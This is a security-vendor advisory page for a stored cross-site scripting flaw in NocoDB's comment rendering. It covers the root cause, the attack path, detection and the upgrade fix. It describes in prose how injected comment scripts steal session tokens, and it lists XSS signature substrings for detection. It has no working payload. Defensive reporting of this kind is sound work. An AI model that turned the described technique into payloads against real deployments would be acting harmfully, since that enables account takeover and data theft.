Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2026-28397

CVE-2026-28397: NocoDB Stored XSS Vulnerability

CVE-2026-28397 is a stored XSS vulnerability in NocoDB caused by unsanitized comment rendering via v-html. Attackers can inject malicious scripts. This article covers technical details, affected versions, and mitigation.

Updated:

CVE-2026-28397 Overview

CVE-2026-28397 is a stored Cross-Site Scripting (XSS) vulnerability in NocoDB, an open-source platform for building databases as spreadsheets. The flaw exists in versions prior to 0.301.3, where comment content is rendered through Vue's v-html directive without prior sanitization. Authenticated users with comment privileges can inject arbitrary HTML and JavaScript that executes in the browser of any user viewing the affected record. The maintainers patched the issue in version 0.301.3.

Critical Impact

Stored JavaScript payloads execute in the context of other authenticated NocoDB users, enabling session theft, unauthorized actions on behalf of the victim, and data exposure within the workspace.

Affected Products

  • NocoDB versions prior to 0.301.3
  • Self-hosted NocoDB deployments using the vulnerable comment feature
  • Any workspace permitting untrusted users to post record comments

Discovery Timeline

  • 2026-03-02 - CVE-2026-28397 published to NVD
  • 2026-03-03 - Last updated in NVD database

Technical Details for CVE-2026-28397

Vulnerability Analysis

The vulnerability is classified as [CWE-79] Improper Neutralization of Input During Web Page Generation. NocoDB's comment subsystem accepts user-supplied content and passes it to the front-end where it is rendered using Vue's v-html directive. The v-html directive performs direct DOM insertion of raw HTML without escaping, treating the input string as trusted markup.

Because NocoDB stores comments server-side and replays them to every viewer of the associated row, any malicious payload becomes persistent. The attack vector is network-based and requires user interaction in the form of a victim opening the affected record. Privileges required are limited to whatever level NocoDB grants for adding comments, which in many deployments includes standard collaborators.

The EPSS probability for this issue remains low, reflecting its dependence on authenticated access and victim interaction rather than direct exposure.

Root Cause

The root cause is the absence of HTML sanitization between comment storage and DOM rendering. The component responsible for displaying comments binds raw stored text to v-html, bypassing Vue's default templating escape behavior. A sanitization library such as DOMPurify, or output via v-text and standard mustache interpolation, would have neutralized the injected markup.

Attack Vector

An attacker with comment permissions submits a comment containing HTML tags with embedded JavaScript event handlers or <script> constructs. When another authenticated user navigates to the record, the comment renders verbatim and the script executes under that user's session. The payload can call NocoDB APIs, exfiltrate authentication tokens stored in the browser, or pivot to higher-privileged accounts such as workspace administrators.

No verified public proof-of-concept code is available. Refer to the GitHub Security Advisory GHSA-rcph-x7mj-54mm for technical details published by the maintainers.

Detection Methods for CVE-2026-28397

Indicators of Compromise

  • Comment records in the NocoDB database containing <script>, <img onerror=, <svg onload=, or other HTML event handler patterns.
  • Outbound HTTP requests from user browsers to unknown domains immediately after loading a record view.
  • Unexpected NocoDB API calls originating from legitimate user sessions, such as token endpoint access from comment views.

Detection Strategies

  • Query the comments table for entries matching common XSS substrings: <script, onerror=, onload=, javascript:, and <iframe.
  • Review web server and reverse proxy access logs for POST requests to comment endpoints containing encoded HTML payloads.
  • Inspect browser Content Security Policy (CSP) violation reports for inline script execution attempts on NocoDB pages.

Monitoring Recommendations

  • Enable verbose audit logging on comment creation and modification events in NocoDB.
  • Forward NocoDB application logs to a centralized SIEM and alert on comment payloads matching XSS signatures.
  • Monitor for anomalous session activity such as administrator API calls originating shortly after a user views a shared record.

How to Mitigate CVE-2026-28397

Immediate Actions Required

  • Upgrade NocoDB to version 0.301.3 or later without delay.
  • Audit existing comments for malicious HTML and remove or neutralize any payloads found.
  • Rotate session tokens and API keys for users who may have viewed affected records.

Patch Information

The maintainers fixed the issue in the NocoDB 0.301.3 release. The patch removes the unsanitized v-html binding and routes comment content through a sanitization step before rendering. Full advisory details are available in GitHub Security Advisory GHSA-rcph-x7mj-54mm.

Workarounds

  • Restrict comment privileges to trusted users only until the upgrade is applied.
  • Deploy a strict Content Security Policy that disallows inline scripts and unknown script sources on the NocoDB origin.
  • Place NocoDB behind a Web Application Firewall configured to inspect and block HTML and JavaScript patterns in comment POST bodies.
bash
# Upgrade NocoDB Docker deployment to the patched release
docker pull nocodb/nocodb:0.301.3
docker stop nocodb && docker rm nocodb
docker run -d --name nocodb \
  -p 8080:8080 \
  -v nocodb_data:/usr/app/data \
  nocodb/nocodb:0.301.3

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne